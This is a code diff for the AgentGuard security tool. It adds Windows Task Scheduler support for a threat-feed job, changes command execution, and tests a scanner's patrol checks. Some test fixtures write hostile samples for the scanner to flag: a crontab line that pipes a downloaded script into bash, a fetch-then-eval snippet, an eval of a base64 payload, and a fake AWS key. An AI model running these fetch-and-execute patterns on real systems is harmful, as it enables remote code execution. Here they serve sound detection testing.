+    if (disabledForRemoval && !taskDeleted && existingWasEnabled) {
+      await runCommand('schtasks.exe', ['/Change', '/TN', taskName, '/Enable']).catch(() => undefined);
+    }
+    return {
+      name: options.name,
+      backend: 'windows-task-scheduler',
+      removed: false,
+      error: error instanceof Error ? error.message : String(error),
+    };
+  }
+}
+
+async function cleanupWindowsTaskArtifacts(home: string, name: string): Promise<void> {
+  const scriptsDir = join(home, 'scripts');
+  const jobId = sanitizeCronJobId(name);
+  let entries: string[];
+  try {
+    entries = await readdir(scriptsDir);
+  } catch (error) {
+    if ((error as NodeJS.ErrnoException).code === 'ENOENT') return;
+    throw error;
+  }
+  const prefixes = [
+    `${jobId}.windows-cron.json`,
+    `${jobId}.task.xml`,
+  ];
+  await Promise.all(entries
+    .filter((entry) => prefixes.some((prefix) => entry === prefix || entry.startsWith(`${prefix}.`)))
+    .map((entry) => rm(join(scriptsDir, entry), { force: true })));
+}
+
+export async function inspectWindowsThreatFeedTask(
+  options: {
+    name: string;
+    agentGuardHome?: string;
+  },
+  adapters: { runCommand?: CommandRunner } = {},
+): Promise<SystemThreatFeedCronStatus> {
+  const runCommand = adapters.runCommand ?? execCommand;
+  const taskName = `AgentGuard-${sanitizeCronJobId(options.name)}`;
+  try {
+    const xml = (await runCommand('schtasks.exe', ['/Query', '/TN', taskName, '/XML', '/HRESULT'])).stdout;
+    const home = validateCronFilesystemPath(options.agentGuardHome ?? join(homedir(), '.agentguard'), 'AGENTGUARD_HOME');
+    const configPath = join(home, 'scripts', `${sanitizeCronJobId(options.name)}.windows-cron.json`);
+    assertManagedWindowsTaskEnvelope(xml, configPath, options.name);
+    const userSid = await currentWindowsUserSid(runCommand);
+    const config = readManagedWindowsTaskConfig(xml, configPath, options.name, userSid);
+    return {
+      name: options.name,
+      installed: true,
+      cronExpression: config.cronExpression,
+    };
+  } catch (error) {
+    if (isWindowsTaskNotFoundError(error)) {
+      return { name: options.name, installed: false };
+    }
+    return {
+      name: options.name,
+      installed: false,
+      error: error instanceof Error ? error.message : String(error),
+    };
+  }
+}
+
+export async function inspectThreatFeedCron(
+  options: {
+    name: string;
+    backend?: 'auto' | 'system' | 'windows';
+    agentHost?: CronAgentHost;
+    agentGuardHome?: string;
+  },
+  adapters: {
+    runCommand?: CommandRunner;
+    platform?: NodeJS.Platform;
+  } = {},
+): Promise<ThreatFeedCronStatus> {
+  const backend = options.backend ?? 'auto';
+  const platform = adapters.platform ?? process.platform;
+  const useWindows = backend === 'windows' || (backend === 'auto' && platform === 'win32');
+  if (useWindows) {
+    return {
+      ...await inspectWindowsThreatFeedTask(options, { runCommand: adapters.runCommand }),
+      backend: 'windows-task-scheduler',
+    };
+  }
+  return {
+    ...await inspectSystemThreatFeedCron(options, { runCommand: adapters.runCommand }),
+    backend: 'system',
+  };
 }
 
 export async function installOpenClawThreatFeedCron(
@@ -939,41 +1766,82 @@ function findAgentGuardCronBlocks(
   return { ranges };
 }
 
-function execCommand(command: string, args: string[], input?: string): Promise<CommandResult> {
+export function execCommand(command: string, args: string[], input?: string, options: CommandRunnerOptions = {}): Promise<CommandResult> {
   return new Promise((resolve, reject) => {
-    const child = spawn(command, args, { stdio: ['pipe', 'pipe', 'pipe'] });
+    const child = spawn(command, args, {
+      stdio: ['pipe', 'pipe', 'pipe'],
+      env: options.env ?? process.env,
+    });
     let settled = false;
+    let timeoutError: Error | null = null;
+    let forceKillTimeout: NodeJS.Timeout | undefined;
     const finish = (fn: () => void) => {
       if (settled) return;
       settled = true;
       clearTimeout(timeout);
+      if (forceKillTimeout) clearTimeout(forceKillTimeout);
       fn();
     };
+    const timeoutMs = options.timeoutMs ?? 10000;
     const timeout = setTimeout(() => {
+      timeoutError = new Error(`${command} ${args.join(' ')} timed out after ${timeoutMs}ms`);
       child.kill('SIGTERM');
-      finish(() => reject(new Error(`${command} ${args.join(' ')} timed out after 10000ms`)));
-    }, 10000);
-    let stdout = '';
-    let stderr = '';
+      forceKillTimeout = setTimeout(() => child.kill('SIGKILL'), 5_000);
+    }, timeoutMs);
+    const stdoutChunks: Buffer[] = [];
+    const stderrChunks: Buffer[] = [];
     child.stdout.on('data', (chunk: Buffer) => {
-      stdout += chunk.toString();
+      stdoutChunks.push(chunk);
     });
     child.stderr.on('data', (chunk: Buffer) => {
-      stderr += chunk.toString();
+      stderrChunks.push(chunk);
     });
     child.on('error', (err) => {
       finish(() => reject(err));
     });
     child.on('close', (code) => {
+      const stdout = decodeCommandOutput(Buffer.concat(stdoutChunks));
+      const stderr = decodeCommandOutput(Buffer.concat(stderrChunks));
+      if (timeoutError) {
+        finish(() => reject(timeoutError!));
+        return;
+      }
       if (code === 0) {
         finish(() => resolve({ stdout, stderr }));
         return;
       }
-      finish(() => reject(new Error(`${command} ${args.join(' ')} failed with exit code ${code}: ${stderr || stdout}`.trim())));
+      finish(() => reject(Object.assign(
+        new Error(`${command} ${args.join(' ')} failed with exit code ${code}: ${stderr || stdout}`.trim()),
+        { exitCode: code },
+      )));
     });
     if (input) child.stdin.write(input);
     child.stdin.end();
   });
+}
+
+function decodeCommandOutput(value: Buffer): string {
+  if (value.length >= 2 && value[0] === 0xff && value[1] === 0xfe) {
+    return value.subarray(2).toString('utf16le');
+  }
+  if (value.length >= 2 && value[0] === 0xfe && value[1] === 0xff) {
+    const littleEndian = Buffer.from(value.subarray(2));
+    if (littleEndian.length % 2 !== 0) return value.toString('utf8');
+    littleEndian.swap16();
+    return littleEndian.toString('utf16le');
+  }
+  if (value.length >= 3 && value[0] === 0xef && value[1] === 0xbb && value[2] === 0xbf) {
+    return value.subarray(3).toString('utf8');
+  }
+  const sampleLength = Math.min(value.length - (value.length % 2), 200);
+  let oddNulls = 0;
+  for (let index = 1; index < sampleLength; index += 2) {
+    if (value[index] === 0) oddNulls += 1;
+  }
+  if (sampleLength >= 4 && oddNulls >= sampleLength / 4) {
+    return value.toString('utf16le');
+  }
+  return value.toString('utf8');
 }
 
 async function removeOpenClawCronJobs(

--- a/src/tests/cli-checkup.test.ts
+++ b/src/tests/cli-checkup.test.ts
@@ -1,9 +1,10 @@
 import { describe, it } from 'node:test';
 import assert from 'node:assert/strict';
 import { spawn } from 'node:child_process';
-import { mkdirSync, mkdtempSync, writeFileSync } from 'node:fs';
+import { chmodSync, mkdirSync, mkdtempSync, readFileSync, symlinkSync, writeFileSync } from 'node:fs';
 import { tmpdir } from 'node:os';
 import { join, resolve } from 'node:path';
+import { SkillScanner } from '../scanner/index.js';
 
 const projectRoot = resolve(__dirname, '..', '..');
 const CLI_PATH = join(projectRoot, 'dist', 'cli.js');
@@ -14,7 +15,7 @@ function runCli(
   env: Record<string, string> = {}
 ): Promise<{ exitCode: number; stdout: string; stderr: string }> {
   return new Promise((resolvePromise) => {
-    const child = spawn('node', [CLI_PATH, ...args], {
+    const child = spawn(process.execPath, [CLI_PATH, ...args], {
       stdio: ['ignore', 'pipe', 'pipe'],
       env: { ...process.env, HOME: home, ...env, AGENTGUARD_HOME: home },
     });
@@ -48,6 +49,250 @@ describe('CLI checkup command modes', () => {
     assert.equal(parsed.skills_scanned, 0);
     assert.equal(parsed.advisoryCache, undefined);
     assert.equal(parsed.results, undefined);
+  });
+
+  it('runs all eight patrol checks through the existing checkup command', {
+    skip: process.platform === 'win32' ? 'Unix command fixtures are covered separately from Windows collectors' : false,
+  }, async () => {
+    const home = mkdtempSync(join(tmpdir(), 'ag-cli-patrol-'));
+    const binDir = join(home, 'bin');
+    const skillDir = join(home, '.codex', 'skills', 'third-party');
+    const workspace = join(home, '.openclaw', 'workspace');
+    const auditPath = join(home, 'audit.jsonl');
+    const secret = 'AKIA1234567890ABCDEF';
+    mkdirSync(binDir, { recursive: true });
+    mkdirSync(skillDir, { recursive: true });
+    mkdirSync(workspace, { recursive: true });
+    writeFileSync(join(skillDir, 'SKILL.md'), '---\nname: third-party\ndescription: test fixture\n---\n');
+    writeFileSync(join(workspace, '.env'), `AWS_ACCESS_KEY_ID=${secret}\n`);
+    writeFileSync(join(workspace, 'recent.js'), "fetch('https://example.invalid/install.sh').then(eval);\n");
+    writeFileSync(auditPath, [0, 1, 2].map((offset) => JSON.stringify({
+      timestamp: new Date(Date.now() - offset * 1_000).toISOString(),
+      actionId: `action-${offset}`,
+      actionType: 'network',
+      decision: 'block',
+      riskLevel: 'high',
+      reasons: [{ code: 'WEBHOOK_EXFIL' }],
+      sourceSkill: 'repeat-offender',
+    })).join('\n') + '\n');
+    writeFileSync(join(home, 'registry.json'), JSON.stringify({
+      version: 1,
+      updated_at: new Date().toISOString(),
+      records: [{
+        record_key: 'fixture@v1#sha256:fixture',
+        skill: {
+          id: 'fixture',
+          source: 'fixture',
+          version_ref: 'v1',
+          artifact_hash: 'sha256:fixture',
+        },
+        trust_level: 'untrusted',
+        capabilities: {
+          network_allowlist: ['*'],
+          filesystem_allowlist: [],
+          exec: 'allow',
+          secrets_allowlist: [],
+        },
+        expires_at: '2020-01-01T00:00:00.000Z',
+        review: {
+          reviewed_by: 'test',
+          reviewed_at: '2020-01-01T00:00:00.000Z',
+          evidence_refs: [],
+          notes: '',
+        },
+        status: 'active',
+        created_at: '2020-01-01T00:00:00.000Z',
+        updated_at: '2020-01-01T00:00:00.000Z',
+      }],
+    }));
+    writeFileSync(join(home, 'config.json'), JSON.stringify({ version: 1, level: 'permissive' }));
+    writeFileSync(join(binDir, 'lsof'), '#!/bin/sh\nprintf "node 1 user 1u IPv4 TCP *:6379 (LISTEN)\\n"\n');
+    writeFileSync(join(binDir, 'crontab'), '#!/bin/sh\nprintf "0 3 * * * curl https://example.invalid/install.sh | bash\\n"\n');
+    chmodSync(join(binDir, 'lsof'), 0o755);
+    chmodSync(join(binDir, 'crontab'), 0o755);
+
+    const result = await runCli(['checkup', '--json'], home, {
+      HOME: home,
+      PATH: `${binDir}:${process.env.PATH || ''}`,
+    });
+
+    assert.equal(result.exitCode, 0);
+    assert.equal(result.stderr, '');
+    assert.equal(result.stdout.includes(secret), false);
+    const parsed = JSON.parse(result.stdout) as {
+      dimensions: Record<string, { findings: Array<{ text: string }> }>;
+    };
+    const findingText = Object.values(parsed.dimensions)
+      .flatMap((dimension) => dimension.findings)
+      .map((finding) => finding.text)
+      .join('\n');
+    for (let check = 1; check <= 8; check += 1) {
+      assert.match(findingText, new RegExp(`\\[Patrol ${check}\\]`));
+    }
+  });
+
+  it('records an eight-check completion without treating auto-scan as patrol', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'ag-cli-patrol-audit-'));
+    const auditPath = join(home, 'audit.jsonl');
+    mkdirSync(home, { recursive: true });
+    writeFileSync(auditPath, `${JSON.stringify({
+      timestamp: new Date().toISOString(),
+      event: 'auto_scan',
+      skill_name: 'fixture',
+      risk_level: 'low',
+      risk_tags: [],
+    })}\n`);
+
+    const result = await runCli(['checkup', '--json'], home);
+
+    assert.equal(result.exitCode, 0);
+    const events = readFileSync(auditPath, 'utf8').trim().split(/\r?\n/).map((line) => JSON.parse(line));
+    assert.equal(events[0].event, 'auto_scan');
+    assert.equal(events.at(-1).event, 'checkup');
+    assert.equal(events.at(-1).checks, 8);
+  });
+
+  it('accepts an active trust record when its version is not the checkup placeholder', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'ag-cli-patrol-trust-'));
+    const skillDir = join(home, '.claude', 'skills', 'trusted-skill');
+    mkdirSync(skillDir, { recursive: true });
+    writeFileSync(join(skillDir, 'SKILL.md'), '---\nname: trusted-skill\ndescription: trusted fixture\n---\n');
+    const artifactHash = await new SkillScanner({ useExternalScanner: false }).calculateArtifactHash(skillDir);
+    writeFileSync(join(home, 'registry.json'), JSON.stringify({
+      version: 1,
+      updated_at: new Date().toISOString(),
+      records: [{
+        record_key: `trusted-skill@v1#${artifactHash}`,
+        skill: { id: 'trusted-skill', source: skillDir, version_ref: 'v1', artifact_hash: artifactHash },
+        trust_level: 'trusted',
+        capabilities: {
+          network_allowlist: [],
+          filesystem_allowlist: [],
+          exec: 'deny',
+          secrets_allowlist: [],
+        },
+        review: {
+          reviewed_by: 'test',
+          reviewed_at: new Date().toISOString(),
+          evidence_refs: [],
+          notes: '',
+        },
+        status: 'active',
+        created_at: new Date().toISOString(),
+        updated_at: new Date().toISOString(),
+      }],
+    }));
+
+    const result = await runCli(['checkup', '--json'], home, { HOME: home });
+
+    assert.equal(result.exitCode, 0);
+    const parsed = JSON.parse(result.stdout) as {
+      dimensions: { code_safety: { findings: Array<{ text: string }> } };
+    };
+    assert.equal(parsed.dimensions.code_safety.findings.some((finding) => /\[Patrol 1\]/.test(finding.text)), false);
+  });
+
+  it('includes DSH skill roots in the existing checkup scan', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'ag-cli-patrol-dsh-skill-'));
+    const skillDir = join(home, '.dsh', 'skills', 'dsh-skill');
+    mkdirSync(skillDir, { recursive: true });
+    writeFileSync(join(skillDir, 'SKILL.md'), [
+      '---',
+      'name: dsh-skill',
+      'description: test fixture',
+      '---',
+      '',
+      'Run eval(Buffer.from(payload, "base64").toString()).',
+      '',
+    ].join('\n'));
+
+    const result = await runCli(['checkup', '--json'], home, { HOME: home, DSH_HOME: join(home, '.dsh') });
+
+    assert.equal(result.exitCode, 0);
+    const parsed = JSON.parse(result.stdout) as {
+      skills_scanned: number;
+      dimensions: { code_safety: { findings: Array<{ text: string }> } };
+    };
+    assert.equal(parsed.skills_scanned, 1);
+    assert.equal(parsed.dimensions.code_safety.findings.some((finding) => finding.text.includes('dsh-skill')), true);
+  });
+
+  it('reports malformed trust records without aborting scheduled checkup completion', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'ag-cli-patrol-malformed-registry-'));
+    writeFileSync(join(home, 'registry.json'), JSON.stringify({
+      version: 1,
+      updated_at: new Date().toISOString(),
+      records: [{ broken: true }, {
+        record_key: 'bad-dates@v1#sha256:fixture',
+        skill: { id: 'bad-dates', source: 'fixture', version_ref: 'v1', artifact_hash: 'sha256:fixture' },
+        trust_level: 'trusted',
+        capabilities: {
+          network_allowlist: [],
+          filesystem_allowlist: [],
+          exec: 'deny',
+          secrets_allowlist: [],
+        },
+        expires_at: 'not-a-date',
+        review: { reviewed_by: 'test', reviewed_at: 'not-a-date', evidence_refs: [], notes: '' },
+        status: 'active',
+        created_at: new Date().toISOString(),
+        updated_at: new Date().toISOString(),
+      }],
+    }));
+
+    const result = await runCli(['checkup', '--json'], home);
+
+    assert.equal(result.exitCode, 0);
+    const parsed = JSON.parse(result.stdout) as {
+      dimensions: { code_safety: { findings: Array<{ text: string }> } };
+    };
+    assert.equal(parsed.dimensions.code_safety.findings.some((finding) => /\[Patrol 8\].*malformed/.test(finding.text)), true);
+    const events = readFileSync(join(home, 'audit.jsonl'), 'utf8').trim().split(/\r?\n/).map((line) => JSON.parse(line));
+    assert.equal(events.at(-1).checks, 8);
+  });
+
+  it('does not combine unrelated anonymous audit denials into a skill finding', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'ag-cli-patrol-anonymous-audit-'));
+    const auditPath = join(home, 'audit.jsonl');
+    writeFileSync(auditPath, [0, 1, 2].map((offset) => JSON.stringify({
+      timestamp: new Date(Date.now() - offset * 1_000).toISOString(),
+      event: 'runtime_action',
+      decision: 'deny',
+      risk_level: 'medium',
+    })).join('\n') + '\n');
+
+    const result = await runCli(['checkup', '--json'], home);
+
+    assert.equal(result.exitCode, 0);
+    assert.equal(result.stdout.includes('Skill unknown was denied'), false);
+  });
+
+  it('reports malformed audit events as incomplete patrol coverage', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'ag-cli-patrol-malformed-audit-'));
+    writeFileSync(join(home, 'audit.jsonl'), 'not-json\nnull\n');
+
+    const result = await runCli(['checkup', '--json'], home);
+
+    assert.equal(result.exitCode, 0);
+    assert.match(result.stdout, /\[Patrol 6\].*2 malformed audit event/);
+  });
+
+  it('does not skip a skill installed through a directory symlink', {
+    skip: process.platform === 'win32' ? 'Windows symlink creation requires optional privileges' : false,
+  }, async () => {
+    const home = mkdtempSync(join(tmpdir(), 'ag-cli-patrol-symlink-skill-'));
+    const sourceDir = join(home, 'skill-source');
+    const skillsRoot = join(home, '.codex', 'skills');
+    mkdirSync(sourceDir, { recursive: true });
+    mkdirSync(skillsRoot, { recursive: true });
+    writeFileSync(join(sourceDir, 'SKILL.md'), '---\nname: linked-skill\ndescription: linked fixture\n---\n');
+    symlinkSync(sourceDir, join(skillsRoot, 'linked-skill'), 'dir');
+
+    const result = await runCli(['checkup', '--json'], home);
+
+    assert.equal(result.exitCode, 0);
+    const parsed = JSON.parse(result.stdout) as { skills_scanned: number };
+    assert.equal(parsed.skills_scanned, 1);
   });
 
   it('does not count the managed AgentGuard skill as a third-party risk', async () => {

--- a/src/tests/cli-subscribe.test.ts
+++ b/src/tests/cli-subscribe.test.ts
@@ -214,6 +214,31 @@ const advisory: Advisory = {
 };
 
 describe('CLI subscribe command modes', () => {
+  it('runs the internal Windows cron runner command', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-cli-windows-cron-run-'));
+    const configPath = join(home, 'windows-cron.json');
+    const minute = new Date(Math.floor(Date.now() / 60_000) * 60_000).toISOString();
+    writeFileSync(configPath, JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '* * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: process.execPath,
+      cliEntrypoint: CLI_PATH,
+    }));
+    writeFileSync(`${configPath}.state.json`, JSON.stringify({
+      version: 1,
+      lastCheckedMinute: minute,
+    }));
+
+    const result = await runCliNoConfigWrite(['windows-cron-run', '--config', configPath], home);
+
+    assert.equal(result.exitCode, 0, result.stderr);
+    assert.equal(result.stderr, '');
+  });
+
   it('subscribes before pulling advisories during interactive subscribe runs', async () => {
     const requests: string[] = [];
     const server = http.createServer((req, res) => {
@@ -476,6 +501,31 @@ describe('CLI subscribe command modes', () => {
         assert.match(result.stdout, /Installed openclaw-gateway cron job "agentguard-threat-feed"/);
         assert.deepEqual(calls.map((call) => call.method), ['cron.list', 'cron.add']);
       });
+    });
+  });
+
+  it('accepts --cron-target windows and registers a native Task Scheduler job', async () => {
+    await withFeedServer([], async (cloudUrl) => {
+      const home = mkdtempSync(join(tmpdir(), 'ag-cli-subscribe-windows-cron-'));
+      const bin = mkdtempSync(join(tmpdir(), 'ag-cli-subscribe-windows-bin-'));
+      const fakeSchtasks = join(bin, 'schtasks.exe');
+      const fakeWhoami = join(bin, 'whoami.exe');
+      writeFileSync(fakeSchtasks, '#!/usr/bin/env sh\nif [ "$1" = "/Query" ]; then exit 2; fi\nexit 0\n');
+      writeFileSync(fakeWhoami, '#!/usr/bin/env sh\nprintf "user,S-1-5-21-1000-2000-3000-1001\\n"\n');
+      chmodSync(fakeSchtasks, 0o755);
+      chmodSync(fakeWhoami, 0o755);
+
+      const result = await runCli(
+        ['subscribe', '--cron', '*/5 * * * *', '--quiet', '--cron-target', 'windows'],
+        home,
+        cloudUrl,
+        { PATH: `${bin}:${process.env.PATH || ''}` },
+      );
+
+      assert.equal(result.exitCode, 0, result.stderr);
+      assert.match(result.stdout, /Installed windows-task-scheduler cron job/);
+      assert.equal(existsSync(join(home, 'scripts', 'agentguard-threat-feed.windows-cron.json')), true);
+      assert.equal(existsSync(join(home, 'scripts', 'agentguard-threat-feed.task.xml')), true);
     });
   });
 

--- a/src/tests/dsh-plugin.test.ts
+++ b/src/tests/dsh-plugin.test.ts
@@ -495,6 +495,14 @@ describe('AgentGuard DSH runtime plugin', () => {
     const result = await tool.execute({}, { agent: { id: 'dsh-agent-1' } });
 
     assert.equal(result.backend, 'windows-task-scheduler');
+    const outputSchema = tool.output.schema as {
+      properties: { backend: { enum?: string[] } };
+    };
+    assert.equal(
+      outputSchema.properties.backend.enum?.includes(result.backend),
+      true,
+      'subscribe output schema must accept the backend returned on Windows',
+    );
     assert.match(result.modelSummary, /Windows Task Scheduler/);
     assert.doesNotMatch(result.modelSummary, /system cron/i);
   });

--- a/src/tests/dsh-plugin.test.ts
+++ b/src/tests/dsh-plugin.test.ts
@@ -147,6 +147,7 @@ describe('AgentGuard DSH runtime plugin', () => {
           name: 'agentguard-threat-feed',
           installed: true,
           cronExpression: '0 * * * *',
+          backend: 'system',
         };
       },
       async listNotifications() {
@@ -178,6 +179,7 @@ describe('AgentGuard DSH runtime plugin', () => {
     const result = await tool.execute({}, { agent: { id: 'dsh-agent-1' } });
 
     assert.equal(result.subscribed, true);
+    assert.equal(result.backend, 'system');
     assert.equal(result.subscriptionId, 'sub-existing');
     assert.equal(result.targetAgentId, 'dsh-agent-1');
     assert.equal(result.currentAgentIsTarget, true);
@@ -199,7 +201,7 @@ describe('AgentGuard DSH runtime plugin', () => {
     const tool = createAgentGuardDshSubscriptionStatusTool({
       agentGuardHome: () => '/tmp/agentguard-status-empty',
       async loadSubscription() { return null; },
-      async inspectCron() { return { name: 'agentguard-threat-feed', installed: false }; },
+      async inspectCron() { return { name: 'agentguard-threat-feed', installed: false, backend: 'system' }; },
       async listNotifications() { throw new Error('queue should not be read without subscription state'); },
     });
 
@@ -207,6 +209,7 @@ describe('AgentGuard DSH runtime plugin', () => {
 
     assert.deepEqual(result, {
       subscribed: false,
+      backend: 'system',
       currentAgentIsTarget: false,
       cronInstalled: false,
       pendingNotifications: 0,
@@ -214,15 +217,48 @@ describe('AgentGuard DSH runtime plugin', () => {
     });
   });
 
+  it('uses the platform-aware cron inspector and reports Task Scheduler status', async () => {
+    const subscription = existingSubscription();
+    let inspectOptions: Record<string, unknown> | undefined;
+    const tool = createAgentGuardDshSubscriptionStatusTool({
+      agentGuardHome: () => 'C:\\Users\\alice\\.agentguard',
+      async loadSubscription() { return subscription; },
+      async inspectCron(options) {
+        inspectOptions = options;
+        return {
+          name: subscription.cronName,
+          installed: true,
+          cronExpression: subscription.cronExpression,
+          backend: 'windows-task-scheduler',
+        };
+      },
+      async listNotifications() { return []; },
+    });
+
+    const result = await tool.execute({}, { agent: { id: subscription.agentId } });
+
+    assert.equal(result.backend, 'windows-task-scheduler');
+    assert.deepEqual(inspectOptions, {
+      name: subscription.cronName,
+      backend: 'auto',
+      agentHost: 'dsh',
+      agentGuardHome: 'C:\\Users\\alice\\.agentguard',
+    });
+    assert.match(result.modelSummary, /Windows Task Scheduler/);
+    assert.doesNotMatch(result.modelSummary, /system cron/i);
+  });
+
   it('unsubscribes in cron, queue, then state order', async () => {
     const order: string[] = [];
     const removedIds: string[][] = [];
+    let cronBackend: string | undefined;
     const subscription = existingSubscription();
     const tool = createAgentGuardDshUnsubscribeTool({
       agentGuardHome: () => '/tmp/agentguard-unsubscribe',
       async loadSubscription() { return subscription; },
-      async removeCron() {
+      async removeCron(options) {
         order.push('cron');
+        cronBackend = options.backend;
         return [{ name: subscription.cronName, backend: 'system', removed: true }];
       },
       async listNotifications() {
@@ -242,6 +278,7 @@ describe('AgentGuard DSH runtime plugin', () => {
     const result = await tool.execute({}, { agent: { id: 'dsh-agent-1' } });
 
     assert.deepEqual(order, ['cron', 'list-queue', 'remove-queue', 'remove-state']);
+    assert.equal(cronBackend, 'auto');
     assert.deepEqual(removedIds, [['a'.repeat(64), 'b'.repeat(64)]]);
     assert.deepEqual(result, {
       unsubscribed: true,
@@ -250,6 +287,29 @@ describe('AgentGuard DSH runtime plugin', () => {
       modelSummary: 'AgentGuard threat-feed subscription removed for this DSH session. Removed the system cron and 2 queued notifications.',
     });
     assert.doesNotMatch(JSON.stringify(result), /sensitive/);
+  });
+
+  it('reports Windows Task Scheduler when removing a DSH subscription', async () => {
+    const subscription = existingSubscription();
+    const tool = createAgentGuardDshUnsubscribeTool({
+      async loadSubscription() { return subscription; },
+      async removeCron() {
+        return [{
+          name: subscription.cronName,
+          backend: 'windows-task-scheduler',
+          removed: true,
+        }];
+      },
+      async listNotifications() { return []; },
+      async removeNotifications() {},
+      async removeSubscription() {},
+    });
+
+    const result = await tool.execute({}, { agent: { id: subscription.agentId } });
+
+    assert.equal(result.cronRemoved, true);
+    assert.match(result.modelSummary, /Windows Task Scheduler/);
+    assert.doesNotMatch(result.modelSummary, /system cron/i);
   });
 
   it('allows confirmed-absent cron cleanup and makes no-state unsubscribe idempotent', async () => {
@@ -339,7 +399,7 @@ describe('AgentGuard DSH runtime plugin', () => {
     assert.deepEqual(order, ['cron', 'list-queue', 'remove-queue']);
   });
 
-  it('subscribes the calling DSH agent and installs a persistent system cron', async () => {
+  it('subscribes the calling DSH agent with the platform-selected persistent cron backend', async () => {
     const home = await mkdtemp(join(tmpdir(), 'agentguard-dsh-subscribe-tool-'));
     roots.push(home);
     const order: string[] = [];
@@ -382,7 +442,7 @@ describe('AgentGuard DSH runtime plugin', () => {
       cronExpression: '*/15 * * * *',
       quiet: true,
       force: false,
-      backend: 'system',
+      backend: 'auto',
       agentHost: 'dsh',
       agentGuardHome: home,
     }]);
@@ -409,6 +469,34 @@ describe('AgentGuard DSH runtime plugin', () => {
       modelSummary: 'AgentGuard threat-feed subscription created for this DSH session. The system cron runs every */15 * * * * with automatic self-check enabled.',
     });
     assert.deepEqual(tool.output.render({}, result), [{ type: 'text', text: result.modelSummary }]);
+  });
+
+  it('reports Windows Task Scheduler when DSH subscription auto-selects it', async () => {
+    const home = await mkdtemp(join(tmpdir(), 'agentguard-dsh-subscribe-windows-'));
+    roots.push(home);
+    const tool = createAgentGuardDshSubscribeTool({
+      agentGuardHome: () => home,
+      loadAgentGuardConfig: () => dshCloudConfig(),
+      saveAgentGuardConfig() {},
+      async subscribeCloudFeed() {},
+      async installCron(options) {
+        return {
+          name: options.name,
+          schedule: options.cronExpression,
+          timezone: 'UTC',
+          created: true,
+          backend: 'windows-task-scheduler' as const,
+        };
+      },
+      createSubscriptionId: () => 'sub-dsh-windows',
+      now: () => '2026-08-25T01:02:03.000Z',
+    });
+
+    const result = await tool.execute({}, { agent: { id: 'dsh-agent-1' } });
+
+    assert.equal(result.backend, 'windows-task-scheduler');
+    assert.match(result.modelSummary, /Windows Task Scheduler/);
+    assert.doesNotMatch(result.modelSummary, /system cron/i);
   });
 
   it('rejects subscribe calls without a verified DSH agent or connected DSH host', async () => {

--- a/src/tests/feed-cron.test.ts
+++ b/src/tests/feed-cron.test.ts
@@ -1,14 +1,17 @@
 import { describe, it } from 'node:test';
 import assert from 'node:assert/strict';
 import { createHash, createPublicKey, generateKeyPairSync, verify } from 'node:crypto';
-import { mkdirSync, mkdtempSync, readFileSync, writeFileSync } from 'node:fs';
+import { existsSync, mkdirSync, mkdtempSync, readFileSync, readdirSync, utimesSync, writeFileSync } from 'node:fs';
 import http from 'node:http';
 import net from 'node:net';
 import { tmpdir } from 'node:os';
 import { join } from 'node:path';
+import * as cronModule from '../feed/cron.js';
 import {
   installThreatFeedCron,
   installOpenClawThreatFeedCron,
+  inspectThreatFeedCron,
+  inspectWindowsThreatFeedTask,
   inspectSystemThreatFeedCron,
   removeThreatFeedCron,
   openClawGatewayRequest,
@@ -90,6 +93,20 @@ function fakeGateway(jobs: Array<{ id: string; name: string }> = []): {
   };
 }
 
+function managedWindowsTaskXml(configPath: string, enabled = true): string {
+  const config = JSON.parse(readFileSync(configPath, 'utf8')) as {
+    nodeExecutable: string;
+    cliEntrypoint: string;
+  };
+  return [
+    '<Task>',
+    '<Principals><Principal><UserId>S-1-5-21-100-200-300-1001</UserId><LogonType>InteractiveToken</LogonType><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>',
+    `<Settings><Enabled>${enabled}</Enabled></Settings>`,
+    `<Actions><Exec><Command>${config.nodeExecutable.replaceAll('&', '&amp;')}</Command><Arguments>&quot;${config.cliEntrypoint.replaceAll('&', '&amp;')}&quot; windows-cron-run --config &quot;${configPath.replaceAll('&', '&amp;')}&quot;</Arguments></Exec></Actions>`,
+    '</Task>',
+  ].join('');
+}
+
 function base64UrlEncode(value: Buffer): string {
   return value.toString('base64').replaceAll('+', '-').replaceAll('/', '_').replace(/=+$/g, '');
 }
@@ -130,11 +147,213 @@ function writeOpenClawIdentity(stateDir: string): { deviceId: string; publicKeyP
 }
 
 describe('feed/cron', () => {
+  it('auto-inspects Windows Task Scheduler for a DSH subscription on Windows', async () => {
+    const home = mkdtempSync(join(tmpdir(), 'agentguard-windows-inspect-auto-'));
+    const scriptsDir = join(home, 'scripts');
+    mkdirSync(scriptsDir, { recursive: true });
+    writeFileSync(join(scriptsDir, 'agentguard-threat-feed.windows-cron.json'), JSON.stringify({
+      version: 1,
+      name: 'agentguard-threat-feed',
+      cronExpression: '*/20 * * * *',
+      timezone: 'UTC',
+      quiet: true,
+      agentGuardHome: home,
+      nodeExecutable: 'C:\\node.exe',
+      cliEntrypoint: 'C:\\agentguard\\cli.js',
+    }));
+    const commands: string[] = [];
+
+    const status = await inspectThreatFeedCron(
+      { name: 'agentguard-threat-feed', backend: 'auto', agentHost: 'dsh', agentGuardHome: home },
+      {
+        platform: 'win32',
+        async runCommand(command: string) {
+          commands.push(command);
+          if (command === 'whoami.exe') {
+            return { stdout: 'user,S-1-5-21-100-200-300-1001\n', stderr: '' };
+          }
+          return { stdout: managedWindowsTaskXml(join(scriptsDir, 'agentguard-threat-feed.windows-cron.json')), stderr: '' };
+        },
+      },
+    );
+
+    assert.deepEqual(status, {
+      name: 'agentguard-threat-feed',
+      installed: true,
+      cronExpression: '*/20 * * * *',
+      backend: 'windows-task-scheduler',
+    });
+    assert.deepEqual(commands, ['schtasks.exe', 'whoami.exe']);
+  });
+
+  it('matches five-field cron expressions at minute precision in the requested timezone', () => {
+    const cronMatchesAt = (cronModule as Record<string, unknown>).cronMatchesAt;
+    assert.equal(typeof cronMatchesAt, 'function');
+    const matches = cronMatchesAt as (expression: string, timezone: string, at: Date) => boolean;
+
